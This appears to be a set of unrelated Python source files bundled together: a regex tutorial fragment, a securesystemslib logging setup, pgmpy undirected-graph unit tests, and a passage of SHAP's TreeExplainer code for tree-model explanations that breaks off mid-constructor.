\n new line
\s space
\t tab
\e escape
\f form feed
\r return
DONT FORGET!:
. + * ? [ ] $ ^ ( ) {} | \
'''
import re
exampleString = '''
Jessica is 15 years old, and Daniel is 27 years old.
Edward is 97, and his grandfather, Oscar, is 102.
'''
ages = re.findall(r'\d{1,3}', exampleString)
names = re.findall(r'[A-Z][a-z]*', exampleString)
print(ages)
print(names)
ageDict = {}
x = 0
for eachName in names:
ageDict[eachName] = ages[x]
x+=1
print(ageDict)
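# Two more patterns built from the identifiers listed above; the expected output
# for this particular exampleString is shown in the comments.
print(re.findall(r'\d+\syears', exampleString))  # ['15 years', '27 years']
print(re.findall(r'\b[A-Z]\w+', exampleString))  # the same four names as above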
|
the-stack_106_19036
|
import logging
# Configure a basic 'securesystemslib' top-level logger with a StreamHandler
# (print to console) and the WARNING log level (print messages of type
# warning, error or critical). This is similar to what 'logging.basicConfig'
# would do with the root logger. All 'securesystemslib.*' loggers default to
# this top-level logger and thus may be configured (e.g. formatted, silenced,
# etc.) with it. It can be accessed via logging.getLogger('securesystemslib').
logger = logging.getLogger(__name__)
logger.setLevel(logging.WARNING)
logger.addHandler(logging.StreamHandler())
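# For example, a consuming application could tune all 'securesystemslib.*' logging
# through this one logger (illustrative snippet for downstream code, not executed here):
#
#   import logging
#   sslib_logger = logging.getLogger('securesystemslib')
#   sslib_logger.setLevel(logging.DEBUG)
#   sslib_logger.addHandler(logging.FileHandler('securesystemslib.log'))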
|
the-stack_106_19038
|
#!/usr/bin/env python3
from pgmpy.base import UndirectedGraph
from pgmpy.tests import help_functions as hf
import unittest
class TestUndirectedGraphCreation(unittest.TestCase):
def setUp(self):
self.graph = UndirectedGraph()
def test_class_init_without_data(self):
self.assertIsInstance(self.graph, UndirectedGraph)
def test_class_init_with_data_string(self):
self.G = UndirectedGraph([("a", "b"), ("b", "c")])
self.assertListEqual(sorted(self.G.nodes()), ["a", "b", "c"])
self.assertListEqual(
hf.recursive_sorted(self.G.edges()), [["a", "b"], ["b", "c"]]
)
def test_add_node_string(self):
self.graph.add_node("a")
self.assertListEqual(list(self.graph.nodes()), ["a"])
def test_add_node_nonstring(self):
self.graph.add_node(1)
self.assertListEqual(list(self.graph.nodes()), [1])
def test_add_nodes_from_string(self):
self.graph.add_nodes_from(["a", "b", "c", "d"])
self.assertListEqual(sorted(self.graph.nodes()), ["a", "b", "c", "d"])
def test_add_node_with_weight(self):
self.graph.add_node("a")
self.graph.add_node("weight_a", weight=0.3)
self.assertEqual(self.graph.nodes["weight_a"]["weight"], 0.3)
self.assertEqual(self.graph.nodes["a"]["weight"], None)
def test_add_nodes_from_with_weight(self):
self.graph.add_node(1)
self.graph.add_nodes_from(["weight_b", "weight_c"], weights=[0.3, 0.5])
self.assertEqual(self.graph.nodes["weight_b"]["weight"], 0.3)
self.assertEqual(self.graph.nodes["weight_c"]["weight"], 0.5)
self.assertEqual(self.graph.nodes[1]["weight"], None)
def test_add_nodes_from_non_string(self):
self.graph.add_nodes_from([1, 2, 3, 4])
def test_add_edge_string(self):
self.graph.add_edge("d", "e")
self.assertListEqual(sorted(self.graph.nodes()), ["d", "e"])
self.assertListEqual(hf.recursive_sorted(self.graph.edges()), [["d", "e"]])
self.graph.add_nodes_from(["a", "b", "c"])
self.graph.add_edge("a", "b")
self.assertListEqual(
hf.recursive_sorted(self.graph.edges()), [["a", "b"], ["d", "e"]]
)
def test_add_edge_nonstring(self):
self.graph.add_edge(1, 2)
def test_add_edges_from_string(self):
self.graph.add_edges_from([("a", "b"), ("b", "c")])
self.assertListEqual(sorted(self.graph.nodes()), ["a", "b", "c"])
self.assertListEqual(
hf.recursive_sorted(self.graph.edges()), [["a", "b"], ["b", "c"]]
)
self.graph.add_nodes_from(["d", "e", "f"])
self.graph.add_edges_from([("d", "e"), ("e", "f")])
self.assertListEqual(sorted(self.graph.nodes()), ["a", "b", "c", "d", "e", "f"])
self.assertListEqual(
hf.recursive_sorted(self.graph.edges()),
hf.recursive_sorted([("a", "b"), ("b", "c"), ("d", "e"), ("e", "f")]),
)
def test_add_edges_from_nonstring(self):
self.graph.add_edges_from([(1, 2), (2, 3)])
def test_number_of_neighbors(self):
self.graph.add_edges_from([("a", "b"), ("b", "c")])
self.assertEqual(len(list(self.graph.neighbors("b"))), 2)
def tearDown(self):
del self.graph
class TestUndirectedGraphMethods(unittest.TestCase):
def test_is_clique(self):
G = UndirectedGraph(
[
("A", "B"),
("C", "B"),
("B", "D"),
("B", "E"),
("D", "E"),
("E", "F"),
("D", "F"),
("B", "F"),
]
)
self.assertFalse(G.is_clique(nodes=["A", "B", "C", "D"]))
self.assertTrue(G.is_clique(nodes=["B", "D", "E", "F"]))
self.assertTrue(G.is_clique(nodes=["D", "E", "B"]))
def test_is_triangulated(self):
G = UndirectedGraph([("A", "B"), ("A", "C"), ("B", "D"), ("C", "D")])
self.assertFalse(G.is_triangulated())
G.add_edge("A", "D")
self.assertTrue(G.is_triangulated())
|
the-stack_106_19039
|
import numpy as np
import scipy.special
import multiprocessing
import sys
import json
import os
import struct
from distutils.version import LooseVersion
from .explainer import Explainer
from ..common import assert_import, record_import_error, DenseData
import warnings
try:
from .. import _cext
except ImportError as e:
record_import_error("cext", "C extension was not built during install!", e)
try:
import pyspark
except ImportError as e:
record_import_error("pyspark", "PySpark could not be imported!", e)
try:
import xgboost
except ImportError as e:
record_import_error("xgboost", "XGBoost could not be imported!", e)
try:
import lightgbm
except ImportError as e:
record_import_error("lightgbm", "LightGBM could not be imported!", e)
try:
import catboost
except ImportError as e:
record_import_error("catboost", "CatBoost could not be imported!", e)
output_transform_codes = {
"identity": 0,
"logistic": 1,
"logistic_nlogloss": 2,
"squared_loss": 3
}
feature_dependence_codes = {
"independent": 0,
"tree_path_dependent": 1,
"global_path_dependent": 2
}
class TreeExplainer(Explainer):
"""Uses Tree SHAP algorithms to explain the output of ensemble tree models.
Tree SHAP is a fast and exact method to estimate SHAP values for tree models and ensembles of trees,
under several different possible assumptions about feature dependence. It depends on fast C++
    implementations either inside an external model package or in the local compiled C extension.
Parameters
----------
model : model object
The tree based machine learning model that we want to explain. XGBoost, LightGBM, CatBoost,
and most tree-based scikit-learn models are supported.
data : numpy.array or pandas.DataFrame
The background dataset to use for integrating out features. This argument is optional when
feature_dependence="tree_path_dependent", since in that case we can use the number of training
samples that went down each tree path as our background dataset (this is recorded in the model object).
feature_dependence : "tree_path_dependent" (default) or "independent"
Since SHAP values rely on conditional expectations we need to decide how to handle correlated
(or otherwise dependent) input features. The default "tree_path_dependent" approach is to just
follow the trees and use the number of training examples that went down each leaf to represent
        the background distribution. This approach respects feature dependencies along paths in the trees.
However, for non-linear marginal transforms (like explaining the model loss) we don't yet
have fast algorithms that respect the tree path dependence, so instead we offer an "independent"
approach that breaks the dependencies between features, but allows us to explain non-linear
transforms of the model's output. Note that the "independent" option requires a background
dataset and its runtime scales linearly with the size of the background dataset you use. Anywhere
from 100 to 1000 random background samples are good sizes to use.
model_output : "margin", "probability", or "log_loss"
What output of the model should be explained. If "margin" then we explain the raw output of the
trees, which varies by model (for binary classification in XGBoost this is the log odds ratio).
If "probability" then we explain the output of the model transformed into probability space
        (note that this means the SHAP values now sum to the probability output of the model). If "logloss"
        then we explain the log base e of the model loss function, so that the SHAP values sum up to the
        log loss of the model for each sample. This is helpful for breaking down model performance by feature.
        Currently the probability and logloss options are only supported when feature_dependence="independent".
"""
def __init__(self, model, data = None, model_output = "margin", feature_dependence = "tree_path_dependent"):
if str(type(data)).endswith("pandas.core.frame.DataFrame'>"):
self.data = data.values
elif isinstance(data, DenseData):
self.data = data.data
else:
self.data = data
self.data_missing = None if self.data is None else np.isnan(self.data)
self.model_output = model_output
self.feature_dependence = feature_dependence
self.expected_value = None
self.model = TreeEnsemble(model, self.data, self.data_missing)
assert feature_dependence in feature_dependence_codes, "Invalid feature_dependence option!"
# check for unsupported combinations of feature_dependence and model_outputs
if feature_dependence == "tree_path_dependent":
assert model_output == "margin", "Only margin model_output is supported for feature_dependence=\"tree_path_dependent\""
else:
assert data is not None, "A background dataset must be provided unless you are using feature_dependence=\"tree_path_dependent\"!"
if model_output != "margin":
if self.model.objective is None and self.model.tree_output is None:
raise Exception("Model does have a known objective or output type! When model_output is " \
"not \"margin\" then we need to know the model's objective or link function.")
# A bug in XGBoost fixed in v0.81 makes XGBClassifier fail to give margin outputs
if str(type(model)).endswith("xgboost.sklearn.XGBClassifier'>") and model_output != "margin":
assert_import("xgboost")
assert LooseVersion(xgboost.__version__) >= LooseVersion('0.81'), \
"A bug in XGBoost fixed in v0.81 makes XGBClassifier fail to give margin outputs! Please upgrade to XGBoost >= v0.81!"
# compute the expected value if we have a parsed tree for the cext
if self.model_output == "logloss":
self.expected_value = self.__dynamic_expected_value
elif data is not None:
self.expected_value = self.model.predict(self.data, output=model_output).mean(0)
if hasattr(self.expected_value, '__len__') and len(self.expected_value) == 1:
self.expected_value = self.expected_value[0]
elif hasattr(self.model, "node_sample_weight"):
self.expected_value = self.model.values[:,0].sum(0)
if self.expected_value.size == 1:
self.expected_value = self.expected_value[0]
self.expected_value += self.model.base_offset
def __dynamic_expected_value(self, y):
""" This computes the expected value conditioned on the given label value.
"""
return self.model.predict(self.data, np.ones(self.data.shape[0]) * y, output=self.model_output).mean(0)
def shap_values(self, X, y=None, tree_limit=None, approximate=False):
""" Estimate the SHAP values for a set of samples.
Parameters
----------
X : numpy.array, pandas.DataFrame or catboost.Pool (for catboost)
A matrix of samples (# samples x # features) on which to explain the model's output.
y : numpy.array
An array of label values for each sample. Used when explaining loss functions.
tree_limit : None (default) or int
            Limit the number of trees used by the model. By default None means to use the limit of the
original model, and -1 means no limit.
approximate : bool
Run fast, but only roughly approximate the Tree SHAP values. This runs a method
previously proposed by Saabas which only considers a single feature ordering. Take care
since this does not have the consistency guarantees of Shapley values and places too
much weight on lower splits in the tree.
Returns
-------
For models with a single output this returns a matrix of SHAP values
(# samples x # features). Each row sums to the difference between the model output for that
sample and the expected value of the model output (which is stored in the expected_value
attribute of the explainer when it is constant). For models with vector outputs this returns
a list of such matrices, one for each output.
"""
# see if we have a default tree_limit in place.
if tree_limit is None:
tree_limit = -1 if self.model.tree_limit is None else self.model.tree_limit
# shortcut using the C++ version of Tree SHAP in XGBoost, LightGBM, and CatBoost
if self.feature_dependence == "tree_path_dependent" and self.model.model_type != "internal" and self.data is None:
phi = None
if self.model.model_type == "xgboost":
assert_import("xgboost")
if not str(type(X)).endswith("xgboost.core.DMatrix'>"):
X = xgboost.DMatrix(X)
if tree_limit == -1:
tree_limit = 0
phi = self.model.original_model.predict(
X, ntree_limit=tree_limit, pred_contribs=True,
approx_contribs=approximate, validate_features=False
)
elif self.model.model_type == "lightgbm":
assert not approximate, "approximate=True is not supported for LightGBM models!"
phi = self.model.original_model.predict(X, num_iteration=tree_limit, pred_contrib=True)
# Note: the data must be joined on the last axis
if self.model.original_model.params['objective'] == 'binary':
warnings.warn('LightGBM binary classifier with TreeExplainer shap values output has changed to a list of ndarray')
phi = np.concatenate((-phi, phi), axis=-1)
if phi.shape[1] != X.shape[1] + 1:
phi = phi.reshape(X.shape[0], phi.shape[1]//(X.shape[1]+1), X.shape[1]+1)
elif self.model.model_type == "catboost": # thanks to the CatBoost team for implementing this...
assert not approximate, "approximate=True is not supported for CatBoost models!"
assert tree_limit == -1, "tree_limit is not yet supported for CatBoost models!"
if type(X) != catboost.Pool:
X = catboost.Pool(X)
phi = self.model.original_model.get_feature_importance(data=X, fstr_type='ShapValues')
# note we pull off the last column and keep it as our expected_value
if phi is not None:
if len(phi.shape) == 3:
self.expected_value = [phi[0, i, -1] for i in range(phi.shape[1])]
return [phi[:, i, :-1] for i in range(phi.shape[1])]
else:
self.expected_value = phi[0, -1]
return phi[:, :-1]
# convert dataframes
orig_X = X
if str(type(X)).endswith("pandas.core.series.Series'>"):
X = X.values
elif str(type(X)).endswith("pandas.core.frame.DataFrame'>"):
X = X.values
flat_output = False
if len(X.shape) == 1:
flat_output = True
X = X.reshape(1, X.shape[0])
if X.dtype != self.model.dtype:
X = X.astype(self.model.dtype)
X_missing = np.isnan(X, dtype=np.bool)
assert str(type(X)).endswith("'numpy.ndarray'>"), "Unknown instance type: " + str(type(X))
assert len(X.shape) == 2, "Passed input data matrix X must have 1 or 2 dimensions!"
if tree_limit < 0 or tree_limit > self.model.values.shape[0]:
tree_limit = self.model.values.shape[0]
if self.model_output == "logloss":
assert y is not None, "Both samples and labels must be provided when explaining the loss (i.e. `explainer.shap_values(X, y)`)!"
assert X.shape[0] == len(y), "The number of labels (%d) does not match the number of samples to explain (%d)!" % (len(y), X.shape[0])
transform = self.model.get_transform(self.model_output)
if self.feature_dependence == "tree_path_dependent":
assert self.model.fully_defined_weighting, "The background dataset you provided does not cover all the leaves in the model, " \
"so TreeExplainer cannot run with the feature_dependence=\"tree_path_dependent\" option! " \
"Try providing a larger background dataset, or using feature_dependence=\"independent\"."
# run the core algorithm using the C extension
assert_import("cext")
phi = np.zeros((X.shape[0], X.shape[1]+1, self.model.n_outputs))
if not approximate:
_cext.dense_tree_shap(
self.model.children_left, self.model.children_right, self.model.children_default,
self.model.features, self.model.thresholds, self.model.values, self.model.node_sample_weight,
self.model.max_depth, X, X_missing, y, self.data, self.data_missing, tree_limit,
self.model.base_offset, phi, feature_dependence_codes[self.feature_dependence],
output_transform_codes[transform], False
)
else:
_cext.dense_tree_saabas(
self.model.children_left, self.model.children_right, self.model.children_default,
self.model.features, self.model.thresholds, self.model.values,
self.model.max_depth, tree_limit, self.model.base_offset, output_transform_codes[transform],
X, X_missing, y, phi
)
# note we pull off the last column and keep it as our expected_value
if self.model.n_outputs == 1:
if self.model_output != "logloss":
self.expected_value = phi[0, -1, 0]
if flat_output:
return phi[0, :-1, 0]
else:
return phi[:, :-1, 0]
else:
if self.model_output != "logloss":
self.expected_value = [phi[0, -1, i] for i in range(phi.shape[2])]
if flat_output:
return [phi[0, :-1, i] for i in range(self.model.n_outputs)]
else:
return [phi[:, :-1, i] for i in range(self.model.n_outputs)]
def shap_interaction_values(self, X, y=None, tree_limit=None):
""" Estimate the SHAP interaction values for a set of samples.
Parameters
----------
X : numpy.array, pandas.DataFrame or catboost.Pool (for catboost)
A matrix of samples (# samples x # features) on which to explain the model's output.
y : numpy.array
An array of label values for each sample. Used when explaining loss functions (not yet supported).
tree_limit : None (default) or int
Limit the number of trees used by the model. None (the default) means use the limit stored in the
original model, and -1 means no limit. (See the commented usage sketch after this method.)
Returns
-------
For models with a single output this returns a tensor of SHAP values
(# samples x # features x # features). The matrix (# features x # features) for each sample sums
to the difference between the model output for that sample and the expected value of the model output
(which is stored in the expected_value attribute of the explainer). Each row of this matrix sums to the
SHAP value for that feature for that sample. The diagonal entries of the matrix represent the
"main effect" of that feature on the prediction and the symmetric off-diagonal entries represent the
interaction effects between all pairs of features for that sample. For models with vector outputs
this returns a list of tensors, one for each output.
"""
assert self.model_output == "margin", "Only model_output = \"margin\" is supported for SHAP interaction values right now!"
assert self.feature_dependence == "tree_path_dependent", "Only feature_dependence = \"tree_path_dependent\" is supported for SHAP interaction values right now!"
transform = "identity"
# see if we have a default tree_limit in place.
if tree_limit is None:
tree_limit = -1 if self.model.tree_limit is None else self.model.tree_limit
# shortcut using the C++ version of Tree SHAP in XGBoost
if self.model.model_type == "xgboost":
assert_import("xgboost")
if not str(type(X)).endswith("xgboost.core.DMatrix'>"):
X = xgboost.DMatrix(X)
if tree_limit == -1:
tree_limit = 0
phi = self.model.original_model.predict(X, ntree_limit=tree_limit, pred_interactions=True)
# note we pull off the last column and keep it as our expected_value
if len(phi.shape) == 4:
self.expected_value = [phi[0, i, -1, -1] for i in range(phi.shape[1])]
return [phi[:, i, :-1, :-1] for i in range(phi.shape[1])]
else:
self.expected_value = phi[0, -1, -1]
return phi[:, :-1, :-1]
# convert dataframes
if str(type(X)).endswith("pandas.core.series.Series'>"):
X = X.values
elif str(type(X)).endswith("pandas.core.frame.DataFrame'>"):
X = X.values
flat_output = False
if len(X.shape) == 1:
flat_output = True
X = X.reshape(1, X.shape[0])
if X.dtype != self.model.dtype:
X = X.astype(self.model.dtype)
X_missing = np.isnan(X, dtype=bool)
assert str(type(X)).endswith("'numpy.ndarray'>"), "Unknown instance type: " + str(type(X))
assert len(X.shape) == 2, "Passed input data matrix X must have 1 or 2 dimensions!"
if tree_limit < 0 or tree_limit > self.model.values.shape[0]:
tree_limit = self.model.values.shape[0]
# run the core algorithm using the C extension
assert_import("cext")
phi = np.zeros((X.shape[0], X.shape[1]+1, X.shape[1]+1, self.model.n_outputs))
_cext.dense_tree_shap(
self.model.children_left, self.model.children_right, self.model.children_default,
self.model.features, self.model.thresholds, self.model.values, self.model.node_sample_weight,
self.model.max_depth, X, X_missing, y, self.data, self.data_missing, tree_limit,
self.model.base_offset, phi, feature_dependence_codes[self.feature_dependence],
output_transform_codes[transform], True
)
# note we pull off the last column and keep it as our expected_value
if self.model.n_outputs == 1:
self.expected_value = phi[0, -1, -1, 0]
if flat_output:
return phi[0, :-1, :-1, 0]
else:
return phi[:, :-1, :-1, 0]
else:
self.expected_value = [phi[0, -1, -1, i] for i in range(phi.shape[3])]
if flat_output:
return [phi[0, :-1, :-1, i] for i in range(self.model.n_outputs)]
else:
return [phi[:, :-1, :-1, i] for i in range(self.model.n_outputs)]
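# Illustrative only -- a minimal usage sketch for shap_interaction_values; the model
# and data names below are placeholders, not part of this module:
#
#   model = xgboost.XGBRegressor().fit(X_train, y_train)
#   explainer = TreeExplainer(model)
#   inter_vals = explainer.shap_interaction_values(X_test)
#   # single-output model -> array of shape (n_samples, n_features, n_features), and
#   # inter_vals[i].sum() + explainer.expected_value approximates the margin output for sample i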
class TreeEnsemble:
""" An ensemble of decision trees.
This object provides a common interface to many different types of models.
"""
def __init__(self, model, data=None, data_missing=None):
self.model_type = "internal"
self.trees = None
less_than_or_equal = True
self.base_offset = 0
self.objective = None # what we explain when explaining the loss of the model
self.tree_output = None # what are the units of the values in the leaves of the trees
self.dtype = np.float64 # for sklearn we need to use np.float32 to always get exact matches to their predictions
self.data = data
self.data_missing = data_missing
self.fully_defined_weighting = True # does the background dataset land in every leaf (making it valid for the tree_path_dependent method)
self.tree_limit = None # used for limiting the number of trees we use by default (like from early stopping)
# we use names like keras
objective_name_map = {
"mse": "squared_error",
"friedman_mse": "squared_error",
"reg:linear": "squared_error",
"regression": "squared_error",
"regression_l2": "squared_error",
"mae": "absolute_error",
"gini": "binary_crossentropy",
"entropy": "binary_crossentropy",
"binary:logistic": "binary_crossentropy",
"binary_logloss": "binary_crossentropy",
"binary": "binary_crossentropy"
}
tree_output_name_map = {
"regression": "raw_value",
"regression_l2": "squared_error",
"reg:linear": "raw_value",
"binary:logistic": "log_odds",
"binary_logloss": "log_odds",
"binary": "log_odds"
}
if type(model) == list and type(model[0]) == Tree:
self.trees = model
elif str(type(model)).endswith("sklearn.ensemble.forest.RandomForestRegressor'>"):
self.dtype = np.float32
scaling = 1.0 / len(model.estimators_) # output is average of trees
self.trees = [Tree(e.tree_, scaling=scaling, data=data, data_missing=data_missing) for e in model.estimators_]
self.objective = objective_name_map.get(model.criterion, None)
self.tree_output = "raw_value"
elif str(type(model)).endswith("skopt.learning.forest.RandomForestRegressor'>"):
self.dtype = np.float32
scaling = 1.0 / len(model.estimators_) # output is average of trees
self.trees = [Tree(e.tree_, scaling=scaling, data=data, data_missing=data_missing) for e in model.estimators_]
self.objective = objective_name_map.get(model.criterion, None)
self.tree_output = "raw_value"
elif str(type(model)).endswith("sklearn.ensemble.forest.ExtraTreesRegressor'>"):
self.dtype = np.float32
scaling = 1.0 / len(model.estimators_) # output is average of trees
self.trees = [Tree(e.tree_, scaling=scaling, data=data, data_missing=data_missing) for e in model.estimators_]
self.objective = objective_name_map.get(model.criterion, None)
self.tree_output = "raw_value"
elif str(type(model)).endswith("skopt.learning.forest.ExtraTreesRegressor'>"):
self.dtype = np.float32
scaling = 1.0 / len(model.estimators_) # output is average of trees
self.trees = [Tree(e.tree_, scaling=scaling, data=data, data_missing=data_missing) for e in model.estimators_]
self.objective = objective_name_map.get(model.criterion, None)
self.tree_output = "raw_value"
elif str(type(model)).endswith("sklearn.tree.tree.DecisionTreeRegressor'>"):
self.dtype = np.float32
self.trees = [Tree(model.tree_, data=data, data_missing=data_missing)]
self.objective = objective_name_map.get(model.criterion, None)
self.tree_output = "raw_value"
elif str(type(model)).endswith("sklearn.tree.tree.DecisionTreeClassifier'>"):
self.dtype = np.float32
self.trees = [Tree(model.tree_, normalize=True, data=data, data_missing=data_missing)]
self.objective = objective_name_map.get(model.criterion, None)
self.tree_output = "probability"
elif str(type(model)).endswith("sklearn.ensemble.forest.RandomForestClassifier'>"):
self.dtype = np.float32
scaling = 1.0 / len(model.estimators_) # output is average of trees
self.trees = [Tree(e.tree_, normalize=True, scaling=scaling, data=data, data_missing=data_missing) for e in model.estimators_]
self.objective = objective_name_map.get(model.criterion, None)
self.tree_output = "probability"
elif str(type(model)).endswith("sklearn.ensemble.forest.ExtraTreesClassifier'>"): # TODO: add unit test for this case
self.dtype = np.float32
scaling = 1.0 / len(model.estimators_) # output is average of trees
self.trees = [Tree(e.tree_, normalize=True, scaling=scaling, data=data, data_missing=data_missing) for e in model.estimators_]
self.objective = objective_name_map.get(model.criterion, None)
self.tree_output = "probability"
elif str(type(model)).endswith("sklearn.ensemble.gradient_boosting.GradientBoostingRegressor'>"):
self.dtype = np.float32
# currently we only support the mean and quantile estimators
if str(type(model.init_)).endswith("ensemble.gradient_boosting.MeanEstimator'>"):
self.base_offset = model.init_.mean
elif str(type(model.init_)).endswith("ensemble.gradient_boosting.QuantileEstimator'>"):
self.base_offset = model.init_.quantile
elif str(type(model.init_)).endswith("sklearn.dummy.DummyRegressor'>"):
self.base_offset = model.init_.constant_[0]
else:
assert False, "Unsupported init model type: " + str(type(model.init_))
self.trees = [Tree(e.tree_, scaling=model.learning_rate, data=data, data_missing=data_missing) for e in model.estimators_[:,0]]
self.objective = objective_name_map.get(model.criterion, None)
self.tree_output = "raw_value"
elif str(type(model)).endswith("sklearn.ensemble.gradient_boosting.GradientBoostingClassifier'>"):
self.dtype = np.float32
# TODO: deal with estimators for each class
if model.estimators_.shape[1] > 1:
assert False, "GradientBoostingClassifier is only supported for binary classification right now!"
# currently we only support the logs odds estimator
if str(type(model.init_)).endswith("ensemble.gradient_boosting.LogOddsEstimator'>"):
self.base_offset = model.init_.prior
self.tree_output = "log_odds"
elif str(type(model.init_)).endswith("sklearn.dummy.DummyClassifier'>"):
self.base_offset = scipy.special.logit(model.init_.class_prior_[1]) # with two classes the trees only model the second class
self.tree_output = "log_odds"
else:
assert False, "Unsupported init model type: " + str(type(model.init_))
self.trees = [Tree(e.tree_, scaling=model.learning_rate, data=data, data_missing=data_missing) for e in model.estimators_[:,0]]
self.objective = objective_name_map.get(model.criterion, None)
elif str(type(model)).endswith("pyspark.ml.classification.RandomForestClassificationModel'>") \
or str(type(model)).endswith("pyspark.ml.classification.GBTClassificationModel'>"):
assert_import("pyspark")
self.original_model = model
self.model_type = "pyspark"
self.trees = [Tree(tree, scaling=model.treeWeights[i]) for i, tree in enumerate(model.trees)]
if model._java_obj.getImpurity() == 'variance':
assert False, "Unsupported objective: variance"
self.objective = objective_name_map.get(model._java_obj.getImpurity(), None)
self.tree_output = "raw_value"
elif str(type(model)).endswith("pyspark.ml.classification.DecisionTreeClassificationModel'>"):
assert_import("pyspark")
self.original_model = model
self.model_type = "pyspark"
self.trees = [Tree(model, scaling=1)]
#model._java_obj.getImpurity() can be gini, entropy or variance.
if model._java_obj.getImpurity() == 'variance':
#TODO handle variance as loss?
assert False, "Unsupported objective: variance"
self.objective = objective_name_map.get(model._java_obj.getImpurity(), None)
#TODO base_offset?
self.tree_output = "raw_value"
elif str(type(model)).endswith("xgboost.core.Booster'>"):
assert_import("xgboost")
self.original_model = model
self.model_type = "xgboost"
xgb_loader = XGBTreeModelLoader(self.original_model)
self.trees = xgb_loader.get_trees(data=data, data_missing=data_missing)
self.base_offset = xgb_loader.base_score
less_than_or_equal = False
self.objective = objective_name_map.get(xgb_loader.name_obj, None)
self.tree_output = tree_output_name_map.get(xgb_loader.name_obj, None)
elif str(type(model)).endswith("xgboost.sklearn.XGBClassifier'>"):
assert_import("xgboost")
self.dtype = np.float32
self.model_type = "xgboost"
self.original_model = model.get_booster()
xgb_loader = XGBTreeModelLoader(self.original_model)
self.trees = xgb_loader.get_trees(data=data, data_missing=data_missing)
self.base_offset = xgb_loader.base_score
less_than_or_equal = False
self.objective = objective_name_map.get(xgb_loader.name_obj, None)
self.tree_output = tree_output_name_map.get(xgb_loader.name_obj, None)
self.tree_limit = getattr(model, "best_ntree_limit", None)
elif str(type(model)).endswith("xgboost.sklearn.XGBRegressor'>"):
assert_import("xgboost")
self.original_model = model.get_booster()
self.model_type = "xgboost"
xgb_loader = XGBTreeModelLoader(self.original_model)
self.trees = xgb_loader.get_trees(data=data, data_missing=data_missing)
self.base_offset = xgb_loader.base_score
less_than_or_equal = False
self.objective = objective_name_map.get(xgb_loader.name_obj, None)
self.tree_output = tree_output_name_map.get(xgb_loader.name_obj, None)
self.tree_limit = getattr(model, "best_ntree_limit", None)
elif str(type(model)).endswith("xgboost.sklearn.XGBRanker'>"):
assert_import("xgboost")
self.original_model = model.get_booster()
self.model_type = "xgboost"
xgb_loader = XGBTreeModelLoader(self.original_model)
self.trees = xgb_loader.get_trees(data=data, data_missing=data_missing)
self.base_offset = xgb_loader.base_score
less_than_or_equal = False
# Note: for ranker, leaving tree_output and objective as None as they
# are not implemented in native code yet
self.tree_limit = getattr(model, "best_ntree_limit", None)
elif str(type(model)).endswith("lightgbm.basic.Booster'>"):
assert_import("lightgbm")
self.model_type = "lightgbm"
self.original_model = model
tree_info = self.original_model.dump_model()["tree_info"]
try:
self.trees = [Tree(e, data=data, data_missing=data_missing) for e in tree_info]
except Exception:
self.trees = None # we get here because the cext can't handle categorical splits yet
self.objective = objective_name_map.get(model.params.get("objective", "regression"), None)
self.tree_output = tree_output_name_map.get(model.params.get("objective", "regression"), None)
elif str(type(model)).endswith("lightgbm.sklearn.LGBMRegressor'>"):
assert_import("lightgbm")
self.model_type = "lightgbm"
self.original_model = model.booster_
tree_info = self.original_model.dump_model()["tree_info"]
try:
self.trees = [Tree(e, data=data, data_missing=data_missing) for e in tree_info]
except Exception:
self.trees = None # we get here because the cext can't handle categorical splits yet
self.objective = objective_name_map.get(model.objective, None)
self.tree_output = tree_output_name_map.get(model.objective, None)
if model.objective is None:
self.objective = "squared_error"
self.tree_output = "raw_value"
elif str(type(model)).endswith("lightgbm.sklearn.LGBMRanker'>"):
assert_import("lightgbm")
self.model_type = "lightgbm"
self.original_model = model.booster_
tree_info = self.original_model.dump_model()["tree_info"]
try:
self.trees = [Tree(e, data=data, data_missing=data_missing) for e in tree_info]
except Exception:
self.trees = None # we get here because the cext can't handle categorical splits yet
# Note: for ranker, leaving tree_output and objective as None as they
# are not implemented in native code yet
elif str(type(model)).endswith("lightgbm.sklearn.LGBMClassifier'>"):
assert_import("lightgbm")
self.model_type = "lightgbm"
self.original_model = model.booster_
tree_info = self.original_model.dump_model()["tree_info"]
try:
self.trees = [Tree(e, data=data, data_missing=data_missing) for e in tree_info]
except Exception:
self.trees = None # we get here because the cext can't handle categorical splits yet
self.objective = objective_name_map.get(model.objective, None)
self.tree_output = tree_output_name_map.get(model.objective, None)
if model.objective is None:
self.objective = "binary_crossentropy"
self.tree_output = "log_odds"
elif str(type(model)).endswith("catboost.core.CatBoostRegressor'>"):
assert_import("catboost")
self.model_type = "catboost"
self.original_model = model
elif str(type(model)).endswith("catboost.core.CatBoostClassifier'>"):
assert_import("catboost")
self.model_type = "catboost"
self.original_model = model
self.dtype = np.float32
cb_loader = CatBoostTreeModelLoader(model)
self.trees = cb_loader.get_trees(data=data, data_missing=data_missing)
self.tree_output = "log_odds"
self.objective = "binary_crossentropy"
elif str(type(model)).endswith("catboost.core.CatBoost'>"):
assert_import("catboost")
self.model_type = "catboost"
self.original_model = model
elif str(type(model)).endswith("imblearn.ensemble._forest.BalancedRandomForestClassifier'>"):
self.dtype = np.float32
scaling = 1.0 / len(model.estimators_) # output is average of trees
self.trees = [Tree(e.tree_, normalize=True, scaling=scaling, data=data, data_missing=data_missing) for e in model.estimators_]
self.objective = objective_name_map.get(model.criterion, None)
self.tree_output = "probability"
else:
raise Exception("Model type not yet supported by TreeExplainer: " + str(type(model)))
# build a dense numpy version of all the tree objects
if self.trees is not None and self.trees:
max_nodes = np.max([len(t.values) for t in self.trees])
assert len(np.unique([t.values.shape[1] for t in self.trees])) == 1, "All trees in the ensemble must have the same output dimension!"
ntrees = len(self.trees)
self.n_outputs = self.trees[0].values.shape[1]
# important to be -1 in unused sections!! This way we can tell which entries are valid.
self.children_left = -np.ones((ntrees, max_nodes), dtype=np.int32)
self.children_right = -np.ones((ntrees, max_nodes), dtype=np.int32)
self.children_default = -np.ones((ntrees, max_nodes), dtype=np.int32)
self.features = -np.ones((ntrees, max_nodes), dtype=np.int32)
self.thresholds = np.zeros((ntrees, max_nodes), dtype=self.dtype)
self.values = np.zeros((ntrees, max_nodes, self.trees[0].values.shape[1]), dtype=self.dtype)
self.node_sample_weight = np.zeros((ntrees, max_nodes), dtype=self.dtype)
for i in range(ntrees):
l = len(self.trees[i].features)
self.children_left[i,:l] = self.trees[i].children_left
self.children_right[i,:l] = self.trees[i].children_right
self.children_default[i,:l] = self.trees[i].children_default
self.features[i,:l] = self.trees[i].features
self.thresholds[i,:l] = self.trees[i].thresholds
self.values[i,:l,:] = self.trees[i].values
self.node_sample_weight[i,:l] = self.trees[i].node_sample_weight
